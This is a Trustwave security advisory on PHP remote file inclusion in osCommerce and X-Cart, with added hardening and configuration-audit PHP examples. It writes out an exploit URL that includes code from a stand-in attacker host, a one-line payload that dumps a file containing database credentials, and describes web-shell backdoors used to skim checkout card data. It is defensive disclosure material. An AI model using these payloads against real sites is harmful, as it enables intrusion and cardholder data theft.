E-commerce Security Advisory: PHP Remote File Inclusion
Executive Summary
In investigations of approximately 300 payment card data security breaches, Trustwave's compromise investigations unit has observed an increase in the successful exploitation of PHP-based e-commerce Web sites via remote file-inclusion vulnerabilities. We believe that this increase is due to the prevalence of PHP-based e-commerce applications and the ease with which an attacker can exploit these applications' vulnerabilities.
 
In recent months, Trustwave's compromise investigations unit has encountered multiple cases in which an attacker took advantage of remote file-inclusion vulnerabilities in PHP-based e-commerce applications. The vendors of these applications have released updates that close the vulnerabilities, but the root problem lies in how the application's operator has configured the application and the PHP installation on the server.
 
Properly configuring PHP on a server can largely eliminate a system's exposure to PHP remote file-inclusion exploits. Two configuration directives, register_globals and allow_url_fopen (together with allow_url_include, which governs include() of URLs from PHP 5.2.0 onward), make the exploit possible: the first lets a request parameter populate the variable that an application passes to include(), and the second lets include() fetch that value over HTTP. With both enabled, malicious users can execute their own PHP code on a vulnerable system.
 
Fortunately, all of these directives can be disabled easily in the php.ini configuration file. In addition, PHP 4.2.0 and later disable register_globals by default, PHP 5.2.0 and later disable allow_url_include by default, and register_globals has been removed altogether as of PHP 5.4.0.
 
Trustwave recommends that online merchants perform stringent code reviews to ensure that their e-commerce applications are properly patched and that the PHP on their servers is securely configured.
 

PHP Remote File Inclusion
Trustwave has seen an increase in the successful exploitation of PHP-based e-commerce Web sites via remote file-inclusion vulnerabilities. We believe this increase is due to the prevalent use of PHP-based e-commerce applications and the simplicity of exploiting these vulnerabilities.
 
PHP remote file inclusion allows an attacker to run their own PHP code on a vulnerable Web site. PHP is particularly susceptible because a default installation of an affected version leaves register_globals or allow_url_fopen enabled; with both settings on, any include() whose argument the request can influence opens a route through which code hosted on a remote system executes as if it were located on the local system.
 
For example, the include_once.php script included with vulnerable versions of the PHP-based osCommerce Online Merchant application provides one such route. The contents of the include_once.php script include the following:

-------- include_once.php -------
<?
// $include_file is never assigned in this script; with register_globals
// enabled it is populated directly from the request.
if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
    include($include_file);
}
?>
---------------------------------
Nothing in this script assigns $include_file, and the defined() guard only prevents a double include; it does not validate the value. With register_globals enabled, an attacker can set the include_file parameter to point at code hosted on a remote Web site simply by requesting the following URL in a browser:
 
http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/a.php
 
This request would execute the a.php script located on the attacker's Web site (MYBOX) on the e-commerce server. The code included will vary depending on the attacker's goals.
 
For example, the following a.php would output the contents of the application_top.php file present on the e-commerce Web site. The contents of the file include authentication credentials (username, password, database location) for the backend MySQL customer database.

--- a.php ---
<? passthru("/bin/cat application_top.php") ?>
-------------
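To make the mechanism concrete, here is an added example (not code from this advisory or from osCommerce) that models the include_once.php pattern above. It shows what include() receives when register_globals hands the request parameter to the script, and a hardened replacement in which the request supplies only a short key that is mapped to an allow-list of local files and verified with realpath(). The temporary include directory, the header.php file and the http://MYBOX/a.php value are constructed for the demo.

```php
<?php
// Added example, not code from the Trustwave advisory or from osCommerce.
// It models the include_once.php pattern to show (a) how register_globals
// hands the attacker control of $include_file and (b) a hardened replacement.
// Run with: php rfi_demo.php

// Constructed request: the query string from the advisory's example URL.
$request = ['include_file' => 'http://MYBOX/a.php'];

// (a) Vulnerable: what include_once.php sees when register_globals is On.
// register_globals imports request parameters as plain variables before the
// script runs; extract() reproduces that behaviour here for demonstration.
function vulnerable_target(array $request): string
{
    extract($request);                 // models register_globals=On
    // In the real script this value goes straight into include(); with
    // allow_url_fopen (PHP < 5.2) or allow_url_include (PHP >= 5.2) enabled,
    // PHP fetches http://MYBOX/a.php and executes it. We only return it.
    return isset($include_file) ? (string) $include_file : '';
}

// (b) Hardened: the request supplies a short key, never a path. The key is
// looked up in an allow-list of files under one fixed directory, and the
// resolved path is checked with realpath() so that '..' segments and stream
// wrappers (http://, ftp://, php://, data:) can never reach include().
function safe_target(string $key, string $includeDir, array $allowed): ?string
{
    if (!array_key_exists($key, $allowed)) {
        return null;                                   // unknown key: refuse
    }
    $base = realpath($includeDir);
    $path = realpath($includeDir . '/' . $allowed[$key]);
    if ($base === false || $path === false) {
        return null;                                   // missing directory or file
    }
    // The resolved path must sit strictly inside the include directory.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Self-contained demo: build a throwaway include directory with one real file.
$includeDir = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
mkdir($includeDir);
file_put_contents($includeDir . '/header.php', "<?php echo 'header';\n");
$allowed = ['header' => 'header.php'];

printf("vulnerable: include() would receive %s\n", vulnerable_target($request));

foreach (['header', 'http://MYBOX/a.php', '../../../etc/passwd', 'php://input'] as $key) {
    $target = safe_target($key, $includeDir, $allowed);
    printf("hardened:   key %-22s -> %s\n", var_export($key, true), $target ?? 'REJECTED');
}

unlink($includeDir . '/header.php');
rmdir($includeDir);
```

The allow-list is the important part: once the request can no longer supply a path, neither register_globals nor the URL wrappers matter for this include(). The realpath() check is defence in depth for the case where a later change lets a file name leak into the map.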
In an actual case of PHP remote file inclusion, the code executed would be significantly more complex than in this example and often results in the download of Web-based backdoors to the local system. Two common Web-based backdoors are r57shell and c99shell. These shells include a Web-based interface that enables their user to download and upload files, create backdoor listeners that monitor traffic on the system, send e-mail, bounce connections to other servers and administrate SQL databases.
 
The following represents the main interface of the r57shell:

[Figure: r57shell Interface]

Copyright 2008, Trustwave
Page 2 of 5

With the r57shell copied to the compromised system, the attacker can easily modify existing Web code from a local Internet browser. In many cases the attacker will modify PHP code associated with the e-commerce application checkout process to send cardholder data to an external e-mail account or force the storage of cardholder data to the backend database for the attacker to retrieve at a later date.


PHP Remote File Inclusion Diagram

1. Attacker's workstation: the attacker targets the vulnerable PHP code and instructs the server via a Web browser to include the a.php file present on the attacker's Web site.
2. Vulnerable PHP-based e-commerce Web site: the a.php script is included and executed on the e-commerce Web site.
3. Attacker's Web site (hosting a.php and r57shell.php): the a.php script instructs the server to download the r57shell.php backdoor to the e-commerce Web site.

Targeted PHP-based E-commerce Applications and Remediation
In a number of our recent investigations of payment card compromises, Trustwave has found attacks targeting vulnerable versions of PHP-based e-commerce applications such as osCommerce and X-Cart. In these investigations, Trustwave has uncovered multiple cases in which an attacker utilizes a remote file-inclusion exploit to gain access to a system and extract sensitive information. We suspect that this increase can be traced to the prevalent use of vulnerable versions of these applications and the ease with which these vulnerabilities can be exploited.
 
The most common manifestation of the PHP remote file-inclusion exploit observed by Trustwave results in the download of a malicious Web-based backdoor onto an e-commerce server and the subsequent alteration of PHP code associated with the checkout process, allowing for the harvest of cardholder data.

Remote file inclusion vulnerabilities in both the osCommerce and X-Cart applications have been publicly disclosed:

Remote file inclusion vulnerabilities

Application                        Vulnerable File     Disclosure Date   Reference
osCommerce Online Merchant v2.1    include_once.php    06/16/2002        Bugtraq ID: 5037
Qualiteam X-Cart 4.x               cmpi.php            09/08/2006        Bugtraq ID: 20108
Qualiteam X-Cart 3.5.0             config.php          09/11/2007        Bugtraq ID: 25637
                                   prepare.php
                                   smarty.php
                                   product.php
                                   auth.php

 
Although the vendors listed above have released updates to patch the vulnerabilities, the root problem lies on the application operator's side, in the configuration of the PHP installation on their server.
 
E-commerce merchants can largely avoid PHP remote file-inclusion exploits by properly configuring the PHP installed on their server. The majority of PHP remote file-inclusion exploits are possible because of two configuration directives within PHP: register_globals, which turns request parameters into PHP variables, and allow_url_fopen (joined in PHP 5.2.0 by allow_url_include, which specifically controls include() and require() of URLs), which lets the interpreter fetch files from a remote site for local execution. Disabling register_globals removes the attacker's control of the included path in applications that rely on it, such as the osCommerce example above; disabling the URL directives stops include() from reaching a remote host even when an application passes a request parameter to include() directly.
 
An administrator can easily disable the register_globals, allow_url_fopen and allow_url_include directives in the php.ini configuration file. In PHP versions 4.2.0 or later, register_globals is disabled by default; in PHP 5.2.0 or later, allow_url_include is disabled by default. As of PHP 5.4.0, the register_globals directive has been removed altogether.
 
In conclusion, to protect against PHP remote file-inclusion exploits, Trustwave recommends that e-commerce merchants perform stringent code reviews to ensure that their e-commerce applications are properly patched and securely configured. At the very least, this process should include disabling register_globals and allow_url_include in the php.ini configuration file, and allow_url_fopen as well wherever no application feature depends on opening URLs with the file functions. Because the command-line PHP and the Web server's PHP module may load different php.ini files, the check should be made against the interpreter that actually serves the site.
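As an added check (example code, not part of the advisory), the following PHP script reports the state of the three directives on the interpreter it runs under and prints the php.ini line to set for each one that is still on. It uses only standard functions (ini_get(), php_ini_loaded_file()); the file name rfi_audit.php is arbitrary.

```php
<?php
// Added example, not from the advisory: audit the php.ini directives behind
// remote file inclusion on the interpreter that runs this script.
// Run as the Web server's PHP (drop it in the document root, request it once,
// then delete it) or with: php -c /path/to/php.ini rfi_audit.php
// CLI and Web SAPIs can load different ini files, so check the one that serves.

// Directive => [value to set, why it matters]. allow_url_include exists only
// in PHP >= 5.2.0 and register_globals was removed in PHP 5.4.0; for a
// directive that does not exist, ini_get() returns false.
function rfi_directives(): array
{
    return [
        'register_globals'  => ['Off', 'request parameters become PHP variables, handing the attacker $include_file'],
        'allow_url_fopen'   => ['Off', 'file functions (and include() before PHP 5.2) can open http:// and ftp:// URLs'],
        'allow_url_include' => ['Off', 'PHP >= 5.2: governs include/require of URLs independently of allow_url_fopen'],
    ];
}

// Normalise the strings ini_get() returns ("1", "On", "", "0") to a boolean.
function ini_is_on($value): bool
{
    if ($value === false) {
        return false;                       // directive does not exist in this PHP
    }
    $v = strtolower(trim((string) $value));
    return !in_array($v, ['', '0', 'off', 'false', 'no'], true);
}

// Returns one finding per directive: whether it exists, whether it is on,
// why it matters and the php.ini line that fixes it.
function audit_rfi_config(): array
{
    $findings = [];
    foreach (rfi_directives() as $name => [$expected, $why]) {
        $raw = ini_get($name);
        $findings[$name] = [
            'present' => $raw !== false,
            'enabled' => ini_is_on($raw),
            'why'     => $why,
            'fix'     => "$name = $expected",
        ];
    }
    return $findings;
}

printf("PHP %s, loaded php.ini: %s\n", PHP_VERSION, php_ini_loaded_file() ?: '(none)');
foreach (audit_rfi_config() as $name => $f) {
    if (!$f['present']) {
        printf("  %-18s not in this PHP version\n", $name);
    } elseif ($f['enabled']) {
        printf("  %-18s ON  <- set '%s' in php.ini: %s\n", $name, $f['fix'], $f['why']);
    } else {
        printf("  %-18s Off\n", $name);
    }
}
```

On PHP 5.2 and later, allow_url_include=Off is the setting that actually stops include() from fetching a URL; allow_url_fopen=Off adds a second layer but also breaks legitimate code that calls file_get_contents() or fopen() on a URL, so test the shop's payment and shipping modules before turning it off in production.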
 
 
 
 
About Trustwave  
Trustwave is a global provider of information security and compliance management solutions to businesses and the 
public sector. The company has serviced more than 30,000 organizations throughout the world including banks, 
merchants, service providers and software developers that are required to validate compliance with industry best 
practices for safeguarding information endorsed by American Express, Discover, MasterCard Worldwide, Visa 
International and Visa USA. Trustwave is a leading certificate authority with thousands of secure sockets layer 
(SSL) certificates issued. Trustwave is headquartered in Chicago with offices throughout North America, South 
America, Europe, the Middle East, Africa, Asia and Australia. 
